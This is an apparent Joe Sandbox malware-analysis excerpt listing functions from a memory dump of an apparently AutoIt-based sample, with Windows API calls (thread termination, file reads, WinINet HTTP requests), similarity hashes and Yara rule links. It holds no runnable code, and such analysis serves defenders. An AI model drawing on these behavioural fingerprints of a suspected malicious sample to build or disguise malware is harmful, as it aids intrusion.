                                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                                  • Opcode ID: c19b258c0588ff83d02b42b8c6f34d3661377db6168acf70b3ee6c1e143e619c
                                                                                                                                                                  • Instruction ID: f749c89c01627c7336058c398b792870746135ccd22f67bfb1addb569d80ebac
                                                                                                                                                                  • Opcode Fuzzy Hash: c19b258c0588ff83d02b42b8c6f34d3661377db6168acf70b3ee6c1e143e619c
                                                                                                                                                                  • Instruction Fuzzy Hash: F0F01D72B41159BBE7215B52FD0EEEF7A7CDBCAB15F004058F60591050D7E06A01C6B5
                                                                                                                                                                  Function 0022A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0022A330
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 0022A341
                                                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,002566D3,?,?,?,?,?,001EE681), ref: 0022A34E
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002566D3,?,?,?,?,?,001EE681), ref: 0022A35B
                                                                                                                                                                    • Part of subcall function 00229CCE: CloseHandle.KERNEL32(?,?,0022A368,?,?,?,002566D3,?,?,?,?,?,001EE681), ref: 00229CD8
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0022A36E
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 0022A375
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                  • Opcode ID: f1b3d5678e1745d686c909410ae5d4f510c5c80e3869c548753f0f823dca9e32
                                                                                                                                                                  • Instruction ID: 75b47b64c22200cc58e5d7074ab34c595849d40b01190c9550b63597411216f0
                                                                                                                                                                  • Opcode Fuzzy Hash: f1b3d5678e1745d686c909410ae5d4f510c5c80e3869c548753f0f823dca9e32
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F05E32A51226ABD3112FA4FD5CDDB7B79EF89702B004561F602914A2CBF59851CB51
                                                                                                                                                                  Function 001EC320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memmove.LIBCMT ref: 001EC419
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00226653,?,?,00000000), ref: 001EC495
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead_memmove
                                                                                                                                                                  • String ID: Sf"
                                                                                                                                                                  • API String ID: 1325644223-2004665406
                                                                                                                                                                  • Opcode ID: ceb3ec440c270707f8fa62a0cb8d53acc605e7c95e0d0cd06b35567dc7bb9803
                                                                                                                                                                  • Instruction ID: 7d12010dd648316750d07fd174cbb40375e3e3129cf61eff921bb1cee146207c
                                                                                                                                                                  • Opcode Fuzzy Hash: ceb3ec440c270707f8fa62a0cb8d53acc605e7c95e0d0cd06b35567dc7bb9803
                                                                                                                                                                  • Instruction Fuzzy Hash: BCA1DD30A04A49EBEB04CF66C884BBDFBB0FF05300F14C195E8699B281D735E966DB91
                                                                                                                                                                  Function 001FD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                    • Part of subcall function 001EBBD9: _memmove.LIBCMT ref: 001EBC33
                                                                                                                                                                  • __swprintf.LIBCMT ref: 001FD98F
                                                                                                                                                                  Strings
                                                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001FD832
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                                                  • Opcode ID: d1ce9dd5ad88eece3abaaa9b37a8d5caeb74789b0a9e6e4df157c9ef34da31fe
                                                                                                                                                                  • Instruction ID: 00be2b1f225bd43e2e46a5e1253463e697a0e3bbe1e95ee4d2b53945391f7885
                                                                                                                                                                  • Opcode Fuzzy Hash: d1ce9dd5ad88eece3abaaa9b37a8d5caeb74789b0a9e6e4df157c9ef34da31fe
                                                                                                                                                                  • Instruction Fuzzy Hash: B9919731128745ABC724EF24C885C7EB7A5FFA5700F00095DF986972A2EB70ED18CB56
                                                                                                                                                                  Function 0023B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023B4A8
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 0023B5B7
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0023B73A
                                                                                                                                                                    • Part of subcall function 0022A6F6: VariantInit.OLEAUT32(00000000), ref: 0022A736
                                                                                                                                                                    • Part of subcall function 0022A6F6: VariantCopy.OLEAUT32(?,?), ref: 0022A73F
                                                                                                                                                                    • Part of subcall function 0022A6F6: VariantClear.OLEAUT32(?), ref: 0022A74B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                                                  • Opcode ID: 56a6b5e40842b8c6345d066b7f2e0875b3ba02db807a3d1e01b96000e65ba4bb
                                                                                                                                                                  • Instruction ID: 7d5ccea83f4c70f03af1162c571bbc6f56586a8f00bd6684873aab8d5c84a17a
                                                                                                                                                                  • Opcode Fuzzy Hash: 56a6b5e40842b8c6345d066b7f2e0875b3ba02db807a3d1e01b96000e65ba4bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 03918CB46183029FCB10DF24C485A5AB7F8EF89704F14486DF98A9B362DB31E945CB52
                                                                                                                                                                  Function 00225D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                  • _memset.LIBCMT ref: 00225E56
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00225E85
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00225F31
                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00225F5B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                                                  • Opcode ID: de042aa983be7f7275c8c8cc475dc38e7af16b61a1b0fdae83f165f723dd5365
                                                                                                                                                                  • Instruction ID: d25560b965934b9f78cf80308a344be58bfa7edab749f8e6b8f3ccaf2eb9e3be
                                                                                                                                                                  • Opcode Fuzzy Hash: de042aa983be7f7275c8c8cc475dc38e7af16b61a1b0fdae83f165f723dd5365
                                                                                                                                                                  • Instruction Fuzzy Hash: BD511531534B32BBD3149FA8E9446ABB7E4AF56360F088529F891D31D1DBB0CD64C792
                                                                                                                                                                  Function 00221050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 002210B8
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002210EE
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 002210FF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00221181
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$CreateInstance
                                                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                                                  • API String ID: 2994846969-1075368562
                                                                                                                                                                  • Opcode ID: 44c91d8a3ffc74a42d896f03e426f9b233326fa24040c9fff6a03aa8ce63c247
                                                                                                                                                                  • Instruction ID: 512ad9c0c9d3302b4f7c26e2a3478aaa89e9c2a8d1a59e7f480fa848db53684a
                                                                                                                                                                  • Opcode Fuzzy Hash: 44c91d8a3ffc74a42d896f03e426f9b233326fa24040c9fff6a03aa8ce63c247
                                                                                                                                                                  • Instruction Fuzzy Hash: F9418971620228FFDB15CF94D884E9A7BA9EF55350B1081A9EA099F209D7B0DD74CBA0
                                                                                                                                                                  Function 00225A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225A93
                                                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00225AAF
                                                                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00225AF5
                                                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002A18F0,00000000), ref: 00225B3E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                                                  • Opcode ID: 51e1456388d303cb8929c3f7b9ee1af5925d90fd91a1e2c9fbea2359671cddf7
                                                                                                                                                                  • Instruction ID: 0048d1aa2bca5e19ec470a0d37b5f5334bdf67abebf1a4eec9f1f94a4cf4e1e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e1456388d303cb8929c3f7b9ee1af5925d90fd91a1e2c9fbea2359671cddf7
                                                                                                                                                                  • Instruction Fuzzy Hash: 1941D331214722BFD710DF64E884B1AB7E8EF89318F04861DF9559B2D1D770E854CB62
                                                                                                                                                                  Function 00240458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00240478
                                                                                                                                                                    • Part of subcall function 001E7F40: _memmove.LIBCMT ref: 001E7F8F
                                                                                                                                                                    • Part of subcall function 001EA2FB: _memmove.LIBCMT ref: 001EA33D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$BuffCharLower
                                                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                  • API String ID: 2411302734-567219261
                                                                                                                                                                  • Opcode ID: fbedc8b2bc6b1dc0d8fad2707d3ae71c2298938635ce5d13cb73a2e87ed38bfb
                                                                                                                                                                  • Instruction ID: 6e24c17788337f682ecf316d2320aa9ddc4af5a89dbe667623088e77f9072d06
                                                                                                                                                                  • Opcode Fuzzy Hash: fbedc8b2bc6b1dc0d8fad2707d3ae71c2298938635ce5d13cb73a2e87ed38bfb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C31E67051061AAFCF04EF58D8809EEB3B5FF24750F508A29E562AB2D1DB71E956CF40
                                                                                                                                                                  Function 0021C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0021C684
                                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0021C697
                                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 0021C6C7
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 458670788-1403004172
                                                                                                                                                                  • Opcode ID: a907b224d7c2d4108b5c9b0ee92ff6bdd808b4071930751b044f23c2b11cb823
                                                                                                                                                                  • Instruction ID: c3b228b8411bbb9fdb83930424e74cccc4d504ea8cdf0cd50fe719f0edcb3973
                                                                                                                                                                  • Opcode Fuzzy Hash: a907b224d7c2d4108b5c9b0ee92ff6bdd808b4071930751b044f23c2b11cb823
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E210476950148BEDB04AB64DC95DFEB7ACDFA2310B208119F426E31E0DBB44D9A9B10
                                                                                                                                                                  Function 002269F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00226A2B
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00226A49
                                                                                                                                                                    • Part of subcall function 00226D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00226DBA
                                                                                                                                                                    • Part of subcall function 00226D6D: GetLastError.KERNEL32 ref: 00226DC5
                                                                                                                                                                    • Part of subcall function 00226D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00226DD9
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226AA4
                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00226B0C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesCreateDirectoryErrorFullLastNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 3499371447-1173974218
                                                                                                                                                                  • Opcode ID: c268cba0cc5ade201b16ebeb035e5ff32e9249629fc5def44b8c6866dd4c20ca
                                                                                                                                                                  • Instruction ID: f2b68c0291c3083344530c705434b38b79cbfa843bf7f9d894fae8034671cee4
                                                                                                                                                                  • Opcode Fuzzy Hash: c268cba0cc5ade201b16ebeb035e5ff32e9249629fc5def44b8c6866dd4c20ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 81312371911229AACF51EFF4E849BDDB7B8AF08300F5045EAE505E3141EB709B99CF64
                                                                                                                                                                  Function 00234A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00234A60
                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00234A86
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00234AB6
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00234AFD
                                                                                                                                                                    • Part of subcall function 002356A9: GetLastError.KERNEL32(?,?,00234A2B,00000000,00000000,00000001), ref: 002356BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                                                                  • Opcode ID: 28b70ca742c5fc23291f3d759ad942ff0f63f2f137343593c17dd68dba9191ea
